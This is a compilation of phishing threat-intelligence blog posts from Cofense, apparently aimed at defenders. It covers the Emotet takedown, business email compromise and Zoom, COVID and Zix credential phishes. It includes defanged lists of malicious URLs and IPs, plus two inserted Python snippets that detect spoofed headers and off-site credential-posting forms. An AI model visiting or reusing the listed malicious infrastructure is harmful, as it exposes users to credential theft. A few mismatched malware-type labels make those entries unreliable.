Emotet Disrupted but Likely to Return

By Brad Haas, Cofense Threat Intelligence 

Background 

Originally a banking Trojan, Emotet evolved to become more of a gateway for other malware families such as Ryuk, TrickBot, and QakBot. For the last few years, it has been among the top producers of malicious emails, using innovative and regularly updated techniques. For example, it recently harvested email reply chains from victims and used them to create effective lures to send to the victims’ contacts. It also uses several tactics to avoid detection, such as delivery via password-protected zip file attachments and hosting itself on a large collection of legitimate but compromised websites. Emotet’s authors have shown remarkable patience and willingness to experiment and innovate: the botnet regularly ceases spam activity for weeks or months, during which time the authors issue updates to existing installations. 

Operation LadyBird 

On January 27, authorities from eight countries conducted a disruption operation against Emotet. According to the Europol press release, the action—named Operation LadyBird—targeted several hundred servers worldwide. Authorities took over Emotet’s primary servers, which deliver updates to infected computers. They issued an update that replaces the list of Emotet command-and-control (C2) servers with a list of C2 servers under law enforcement control. Ukrainian police also identified two Emotet operators, from whom they seized cash, computers and other associated equipment. Finally, Dutch authorities recovered a trove of data stolen from Emotet victims, including email addresses, user names and passwords. They published a website allowing users to check whether their email address was in the compromised data. 

Figure 1: An Emotet email with an attached malicious Microsoft Office document, found in an environment protected by Microsoft Office 365 Advanced Threat Protection. 

What Happens Next 

Although Operation LadyBird had an immediate and substantial impact on Emotet operations, we assess that the botnet will likely return within the year. Despite the arrests in Europe, the threat actors ultimately in charge of Emotet remain at large. It is possible that they will simply retire, but even in that case the remnants of the botnet and the business relationships with other malware operators would likely be passed on to others. Emotet has been so effective that abandoning it entirely would very likely represent a lost opportunity for considerable profit. 

TrickBot survived a similar takedown in October 2020—it was built with a backup C2 configuration that allowed it to return to operation within a few weeks. Emotet has no such backup, but its operators can likely leverage their close relationship with the operators of TrickBot and other families to regain a broad base of installations on infected computers. Emotet’s operators also very likely have copies of the compromised data seized by the authorities, and there may be other data sets that were not seized. As we discussed above, they were already in the habit of taking long breaks in order to make improvements. We assess that they will likely withdraw again for at least a few months, improve their infrastructure to be more resilient against future law enforcement action, and then begin rebuilding their botnet. 

Note to Cofense Intelligence customers: You can refer to our July 2020 Flash Alert and our December 2020 Flash Alert for more details on previous Emotet lulls. 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.   
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.   

Phish Found in Proofpoint-Protected Environments Week ending January 29, 2021

100% of the phish seen by the Cofense Phishing Defense Center (PDC) were found in environments protected by secure email gateways (SEGs), were reported by humans, and were analyzed and dispositioned by Cofense Triage.  

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes.  

Are phishing emails evading your secure email gateway? The following are examples of phishing emails recently seen by the PDC in environments protected by Proofpoint and other SEGs. 

TYPE: ZLoader 

DESCRIPTION:  Finance-themed emails found in environments protected by Proofpoint deliver ZLoader via malicious Microsoft Office macros. 

TYPE: Credential Phish 

DESCRIPTION: IRS-spoofed emails found in environments protected by Proofpoint and Microsoft ATP deliver credential phishing via an embedded URL. 

TYPE: Credential Phish 

DESCRIPTION: LAN Associates-spoofing emails found in environments protected by O365-ATP deliver credential phishing via an embedded URL. 

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and report suspicious emails. Cofense PhishMe customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade secure email gateways.

Interested in seeing more? Search our Real Phishing Threats Database.


Threat Actor Attempt At Auditing: New Business Email Compromise Tactic

By Noah Mizell and Ashley Tran, Cofense Phishing Defense Center

The tactics used for conversations in business email compromise (BEC) can vary, based on topics that often appear specific to a fellow coworker or to a collaboration on a private task for the CEO or another high-ranking executive. The members of the Cofense PDC are all too familiar with, for example, the line, “I want to surprise the staff with gifts.” However, threat actors have caught on to the fact that their tactics are not so secret anymore and are well documented. With this newfound awareness comes the need to evolve methods. As noted in previous Cofense blogs, this can involve soliciting end users for sensitive revenue and customs details or, in the case shown in Figure 1, posing as an audit for open invoices between two companies.

Figure 1: Email Body 

In Figure 1, it can be noted that an email has been forwarded by an external user who had suspicions regarding the email seen under “Begin forwarded message.” The initial email is a request detailing the need to update the impersonated company’s “account record” for the forwarding user’s company, and asks for details on “any unpaid payments or an invoice due till date.” Following this request is the forged – yet convincing – email signature for that impersonated company’s chief financial officer, complete with logo.

Because this email was forwarded, the sender details can be seen in the body of the email. The threat actor has spoofed the sender email to appear as though it really did originate from the impersonated company: [email protected][REDACTEDCOMPANY].com. However, the actual email behind this attack is in the reply-to section of this email: [email protected]

The goal of this scam is simple – to obtain the invoice information and utilize it in a follow-up attack. This attack would reference the specific confidential information that was attained to get payment in the name of the impersonated company. Although the subject and wording of this BEC is different from the typical gift card request, or favor for the CEO, the impact most likely to result remains the same: financial crime.


Phish Found in Proofpoint-Protected Environments Week ending January 22, 2021

100% of the phish seen by the Cofense Phishing Defense Center (PDC) were found in environments protected by secure email gateways (SEGs), were reported by humans, and were analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint secure email gateway? The following are examples of phishing emails recently seen by the PDC in environments protected by Proofpoint.

TYPE: Trojan 

DESCRIPTION: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via embedded links. 

TYPE: Keylogger 

DESCRIPTION: Order-themed emails found in environments protected by Proofpoint and O365-ATP deliver TrickBot via Microsoft Office macro-laden spreadsheets downloaded from embedded URLs. 

TYPE: Trojan  

DESCRIPTION: Impots-spoofing emails found in environments protected by Proofpoint deliver the Client Maximus banking Trojan via an advanced INF installer that is downloaded from an embedded URL. 

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and report suspicious emails. Cofense PhishMe customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade secure email gateways.

Interested in seeing more? Search our Real Phishing Threats Database.


Zoom Phish Sent Via Constant Contact Mailer

By Ashley Atkins, Cofense Phishing Defense Center

Since the start of the pandemic, cloud-based video conferencing has been heavily utilized. Whether for work purposes or for simply keeping in touch with family and friends, access to such a tool is vital. With the increased use of video conferencing, threat actors are taking advantage and abusing well-known video conferencing brands.   

The Cofense Phishing Defense Center (PDC) investigated an email impersonating Zoom. The email claimed that a Zoom server upgrade had been performed and that the recipient would be unable to invite or join calls unless they verified their account. Upon analysis, the PDC quickly identified the email as a credential phish. Within the email headers, the From field typically shows a display name and email address such as John Doe <[email protected]>. However, instead of the display name showing a person’s name, it showed “Zoom – [email protected](.)us”, making it appear as though the email was from Zoom.

Figure 1: Email Body 

While Cofense has written about Zoom in prior blog posts, it is important to note that this particular email was sent through Constant Contact, a service used to send email for marketing campaigns. As noted on the Constant Contact website, the company provides a unique campaign ID in the Message-ID field allowing them to identify the sender. The headers shown in Figure 2 confirm that Constant Contact was used in this phishing attack. The attacker may have believed that Constant Contact emails would be better able to bypass various SEGs – a maneuver that seems to have been solid given the substantial number of SEG environments in which this phish was found.

Figure 2: Headers  

Figure 3: Malicious URL 

In Figure 3, the email shows the sender’s name to be “Zoom – no [email protected].us.” However, the actual compromised sender account can be seen beside it. This suggests that the threat actor may have compromised a user of Constant Contact, and has utilized that account to send out the attacks.

Hovering over the “Activate Now” button, Constant Contact’s tracking URL (r20[.]rs6[.]net) can be seen, as shown in Figure 3. When clicked, the recipient is directed to “sankamilan[.]com” and then redirected to a fake Microsoft login page at “fueamgm[.]com[.]br,” as shown in Figure 4. Once credentials have been entered, the recipient is redirected again to a Microsoft inbox. 

Figure 4-5: Phishing Page 

As we can see, two different brands were used in this phishing campaign, which could result in attackers harvesting multiple sets of credentials.  
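The header anomalies described in the BEC post above (a Reply-To that routes answers away from the spoofed From address) and in this Zoom post (a display name carrying a Zoom address while the real sender is a bulk-mailer account, with the mailer’s own Message-ID) can be checked mechanically by a triage analyst. The following is an added example, not code from the original posts; the two messages it parses are constructed samples using .example domains, and the Message-ID value is a placeholder rather than Constant Contact’s real campaign-ID format.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Matches an email address embedded anywhere in a display name.
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

# Constructed sample of the "audit" BEC pattern: From is spoofed to the impersonated
# company, while Reply-To quietly routes replies to a free-mail account.
BEC_SAMPLE = """\
From: "Chief Financial Officer" <cfo@impersonated-company.example>
Reply-To: <accounts.audit@freemail.example>
To: <ap@target-company.example>
Subject: Account record update - unpaid invoices
Message-ID: <20210118.001@impersonated-company.example>

Please send details on any unpaid payments or invoices due till date.
"""

# Constructed sample of the Zoom pattern: the display name carries a Zoom address, the
# actual sender is a compromised bulk-mailer account, and the Message-ID is issued by the
# mailer's domain (placeholder format, not Constant Contact's real one).
ZOOM_SAMPLE = """\
From: "Zoom - no-reply@zoom.example" <news@compromised-account.example>
To: <user@target-company.example>
Subject: Zoom server upgrade - verify your account
Message-ID: <campaign-PLACEHOLDER@bulk-mailer.example>

Activate now to keep joining calls.
"""


def _domain(addr):
    """Lower-cased domain part of an address, or '' if there is none."""
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


def analyze_headers(raw_message):
    """Return a list of finding strings; an empty list means no sender anomaly was seen."""
    msg = message_from_string(raw_message)
    findings = []
    display_name, from_addr = parseaddr(msg.get("From", ""))
    from_domain = _domain(from_addr)

    # 1. Reply-To routed somewhere other than the visible sender (the BEC audit lure).
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    reply_domain = _domain(reply_addr)
    if reply_domain and reply_domain != from_domain:
        findings.append(f"reply-to-mismatch: replies go to {reply_domain}, not {from_domain}")

    # 2. An address inside the display name that the real sender does not own
    #    (the "Zoom - no-reply@..." trick).
    for shown in EMAIL_RE.findall(display_name):
        if _domain(shown) != from_domain:
            findings.append(f"display-name-address: shows {shown}, actual sender domain {from_domain}")

    # 3. Message-ID issued by a domain other than the sender's: the message was relayed
    #    through a third-party mailer and deserves a closer look.
    msgid_domain = _domain(msg.get("Message-ID", "").strip().strip("<>"))
    if msgid_domain and msgid_domain != from_domain:
        findings.append(f"third-party-message-id: {msgid_domain}")
    return findings


if __name__ == "__main__":
    for label, sample in (("BEC", BEC_SAMPLE), ("Zoom", ZOOM_SAMPLE)):
        print(label, analyze_headers(sample))
```

A clean message (From, Reply-To and Message-ID all on one domain) yields no findings, so the checks can run on every reported email without drowning the analyst.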

Indicators of Compromise 

Link  IP 
hXXp://r20[.]rs6[.]net/tn.jsp?f=001SZ-07esJCtmzsTnl-2ahmSsp3CpswNGStwYWGtC_zI013A-LeFdz-SawGYz8wUt1zjLruZbLT67G_tPvkDNXRwcoznHPJSK7RS79ZwHLoicSBO6M6Tr-sPHkQ365MAq327s4IDhxhcGO2259_pUcjNZeRvwUri8p&c=3H_CP9T_hN834FXay-T3bJQcfuvdg7UAdRmIAMdqKRos8XzZ8B  213[.]190[.]6[.]27 
hXXps://sankamilan[.]com//httpd/  208[.]75[.]122[.]11 
hXXps://fueamgm[.]com[.]br/httd/  162[.]144[.]238[.]226 

Coronavirus Screening and Testing Phishing Emails, and a Sense of Urgency Among Employees

By Ala Dabat, Cofense Phishing Defense Center

The Cofense PDC (Phishing Defense Center) has seen a continuous campaign by malicious actors exploiting the COVID-19 pandemic, using cleverly crafted phishing email campaigns to harvest sensitive user data and spread malicious payloads across industry sectors.  

One such example seems to exploit the sense of urgency felt among employees for tests to screen for the COVID-19 virus. Recipients’ vulnerability is leveraged in attacks such as the one in Figure 1, a Google form that appears to have been issued to employees by the targeted company or companies. 

Figure 1 

The aesthetics of this particular campaign are solid and simple enough to reach users in environments protected by secure email gateways (SEGs). 

The email appears to be from the target company, and its legitimacy is reinforced by references to guidelines and protocols issued by the “United States Department of Health.” Employees are advised that these protocols will facilitate the screening process, a clever way to persuade recipients to hand over credentials and other sensitive information (Figure 2). 

Figure 2 

In the above example, targeted users are redirected to a Google Doc landing page hosting the malicious website. A legitimate Google-registered URL can often convince even security-conscious users into handing over their information. 

Figure 3 

Figure 3 shows that the threat actor is blending common screening questions with the request for sensitive credentials, possibly to divert recipients from the threat. 

Figure 4 

Once the form has been completed, recipients are told to provide a digital signature to wrap up the fraudulent screening application and submit the data to a command-and-control server that stores the harvested information. 

Figure 5 

Indicators of Compromise 

Link  IP 
hXXps://docs[.]google[.]com/forms/d/e/1FAIpQLSdoUChSaN51UxKlyDMXUCOg6v5dMrqrcbDjFhX9LEFQ0zKWDQ/viewform?vc=0&c=0&w=1&flr=0&usp=mail_form_link  172[.]217[.]9[.]206 


Secure Mailer Phish: A New Method of Swiping Users’ Credentials?

By Zachary Bailey, Cofense Phishing Defense Center

The rise in phishing attacks and the increased delivery of sensitive information over email have fueled the demand for “secure mailers.” These services encrypt and store your organization’s emails, only unlocking them if the designated recipient signs in. This takes the stress off the organization’s SEGs, or secure email gateways, when it comes to checking emails for sensitive or personally identifiable information (PII). However, secure mailers can be spoofed and their credentials harvested, creating a new threat vector for sensitive emails. 

Zix is a common secure mailer that is observed by the Cofense PDC. One threat actor mimicked Zix branding to create a lookalike phishing page using a custom domain that bypassed SEG protection. The attack relies on the target’s familiarity with Zix as they click through the encryption message and land on a Microsoft phishing page. After submitting their credentials, the victim is redirected to a legitimate OneDrive error page.  

Figure 1: Email Body 

The email in Figure 1 looks typical of a secure mailer and uses a Zix message tag. The note saying “Michelle sent you a secure message” reinforces familiarity and lures the recipient into a false sense of security. The only lure here is asking the user to “Click here” to read on, while also advising how to complete the next step once they land on the website.  

Figure 2: Email Body Showing URL 

If the recipient hovers over the link, as shown in Figure 2, they will see that it goes to a “securemail” sub-domain, which is a common setup for these services. In the body of the message, they also see the expiration date for retrieving the message.

Figure 3: Phishing Page 

In Figure 2 we see that the website mimics the Zix landing site, which directs the recipient to interact with a “click to read message” button (Figure 3). The site is also served over HTTPS, so data sent through it cannot be read in transit. If the user hovers over the button, they will notice that it leads to a different website. This is shown in Figure 4.   

Figure 4: Phishing Page 

During the transition from the secure mailer page, the title of the tab has changed from “SecureMail!” to “Sign in to your account,” accompanied by a Microsoft login page. This is an uncommon occurrence for secure mailers as they typically have their own login pages. 

Figure 5: Phishing Page 

After the user provides their credentials, a redirect occurs, taking them to a OneDrive error page. Inspecting the network traffic shows that the entered credentials have been sent to the threat actor rather than Microsoft. This error page is a common tactic to convince the user that “something went wrong” and to postpone or prevent recognition that their credentials were harvested.  
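A defender reviewing a captured copy of such a lookalike page can confirm the behaviour described above (the click-through to a second site, the changed page title, and a login form that posts to the threat actor rather than Microsoft) without ever submitting anything. The following is an added example, not code from the original post: it parses constructed stand-ins for the two pages, with .example placeholder hosts, and reports every link and form action that leaves the page’s own host.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed stand-in for the Zix-styled landing page on a "securemail" subdomain.
SECUREMAIL_URL = "https://securemail.lookalike-domain.example/"
SECUREMAIL_HTML = """
<html><head><title>SecureMail!</title></head>
<body><p>Michelle sent you a secure message.</p>
<a href="https://second-site.example/o1/main.html">Click to read message</a>
</body></html>
"""

# Constructed stand-in for the Microsoft-styled login page the button leads to.
LOGIN_URL = "https://second-site.example/o1/main.html"
LOGIN_HTML = """
<html><head><title>Sign in to your account</title></head>
<body>
<form method="post" action="https://collector.example/post.php">
<input name="login"><input name="passwd" type="password">
<input type="submit" value="Sign in">
</form>
<a href="/help.html">Can't access your account?</a>
</body></html>
"""


class _PageScanner(HTMLParser):
    """Collects the page title, every form action and every link href."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self._in_title = False
        self.form_actions = []
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "form":
            # A missing action means the form posts back to the page itself.
            self.form_actions.append(attrs.get("action") or "")
        elif tag == "a" and attrs.get("href"):
            self.hrefs.append(attrs["href"])

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data.strip()


def scan_page(page_url, html):
    """Report where the page's forms and links actually go, relative to its own host."""
    scanner = _PageScanner()
    scanner.feed(html)
    own_host = urlsplit(page_url).hostname

    def offsite(raw_target):
        # Resolve relative targets against the page URL before comparing hosts.
        absolute = urljoin(page_url, raw_target)
        return absolute if urlsplit(absolute).hostname != own_host else None

    return {
        "title": scanner.title,
        "offsite_forms": [u for u in (offsite(a) for a in scanner.form_actions) if u],
        "offsite_links": [u for u in (offsite(h) for h in scanner.hrefs) if u],
    }


if __name__ == "__main__":
    print(scan_page(SECUREMAIL_URL, SECUREMAIL_HTML))
    print(scan_page(LOGIN_URL, LOGIN_HTML))
```

For the login page, a non-empty "offsite_forms" list is the static equivalent of the network-traffic observation in the post: the credentials would go to a host other than the one serving the page.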

Indicators of Compromise 

Link  IP 
hXXps://securemail[.]uadiaspora[.]com/  45[.]58[.]117[.]154 
hXXps://nojokemarketingpodcast[.]com/o1/main.html?  162[.]241[.]157[.]65 

Phish Found in Proofpoint-Protected Environments Week ending January 15, 2021

100% of the phish seen by the Cofense Phishing Defense Center (PDC) were found in environments protected by secure email gateways (SEGs), were reported by humans, and were analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint secure email gateway? The following are examples of phishing emails recently seen by the PDC in environments protected by Proofpoint.

TYPE: Credential Phish 

DESCRIPTION:  Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via an embedded URL. 

 

TYPE: Credential Phish 

DESCRIPTION: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via an embedded URL. Note: This was in Spanish. 

TYPE: Keylogger 

DESCRIPTION: Finance-themed emails found in environments protected by Symantec deliver the Agent Tesla keylogger via an embedded URL. 

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and report suspicious emails. Cofense PhishMe customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade secure email gateways.

Interested in seeing more? Search our Real Phishing Threats Database.


Phishing Emails: All I Wanted Was for 2020 to End

By Dylan Duncan

2020 was far from ordinary 

And at the end, we learned one thing for sure: threat actors’ ability to quickly adjust their methods to world events is pretty uncanny. Like the rest of us, they must be news junkies, too.  

Every year, we see threat actors improve their methods and adapt to world events, bringing new trends to the phishing threat landscape. Last year, the COVID-19 pandemic in particular brought an unprecedented amount of disruption and financial hardship, directly leading to an increase in both the volume and variety of threat activity. Threat actors continued to advance their tactics, techniques and procedures to ensure their emails would reach end users throughout the year. 

Here are a few things we learned from the longest March to December in history:
 

  • COVID-19 was certainly the source of the most disruption in 2020. During the peak of pandemic-themed campaigns, phishing emails predominantly delivered credential phishing and Agent Tesla keylogger, but threat actors also delivered ransomware, keyloggers, remote access trojans and information stealers. 
  • Remote work became the new standard for an unprecedented number of employees as the pandemic led to lockdown protocols and workplace restrictions. The technologies associated with remote work led to new opportunities for threat actors, such as spoofing video chat applications and collaboration platforms.  
  • The Agent Tesla keylogger has been a prolific malware family since its release in 2014. This year it was the highest-volume keylogger and one of the top malware families overall observed by Cofense Intelligence. Agent Tesla has a competitive price tag compared to other malware and provides threat actors with complex features while maintaining an easy-to-use user experience.  
  • Since 2014, the Emotet botnet has been one of the top contributors to the phishing threat landscape. The more notable changes that surfaced this year allow for it to steal email attachments from victims’ inboxes, which are then used in phishing campaigns against targets who would find the attachments familiar. 
  • Ransomware was very active throughout the year, with a high number of new families and developments compared to other malware types. During October, United States authorities warned about campaigns targeting the health care industry. The campaigns delivered BazarBackdoor, which threat actors could use later to deploy Ryuk ransomware to intended targets.  

Phishing emails weaponizing the COVID-19 pandemic, the remote work environment and the presidential election were more effective than generic phishing templates. As the pandemic continues into the coming year, we expect that some related themes will continue, and we stand at the ready (as does our network of 25 million around the world identifying and reporting phish) for newly emerging themes and trends. 
